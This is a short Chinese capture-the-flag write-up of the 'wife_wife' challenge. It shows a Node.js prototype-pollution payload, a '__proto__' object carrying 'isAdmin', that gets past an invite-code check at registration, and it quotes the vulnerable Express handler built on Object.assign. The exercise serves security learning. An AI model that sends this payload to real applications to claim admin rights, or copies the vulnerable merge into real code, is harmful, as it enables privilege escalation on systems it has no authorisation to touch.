攻防世界wife_wife

看这名字就不是爆破......注册有个管理员选项！！一开始注册没有勾选就出来flag了，好吧是假的。

推测应该是要管理员身份注册，先抓包，可以看到isAdmin是false，现在要改为ture，直接改当然不行。

好吧到这我就没有想法了，看了看别的师傅的wp，恍然大悟。。。。nodejs污染

简单来讲，通过 newUser.__proto__ 可以访问到新对象的原型

将

"isAdmin":true

构造为

"__proto__":{
"isAdmin":true
}

污染成功

返回重新登录，得到flag

继续分析一下，先看其他师傅给的部分源码

app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user) //就是这里，原型链污染
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})

原来Object.assign也能触发原型链污染。let newUser = Object.assign({}, baseUser, user)的作用是把baseUser和user的属性合并后拷贝到{}中，即newUser是baseUser和user的集合体。baseUser猜测是user类似父类的东西，user应该就是上面的{"username":"b","password":"b","isAdmin":false}部分了。

感悟就是nodejs原型链污染还是很薄弱，学的太浅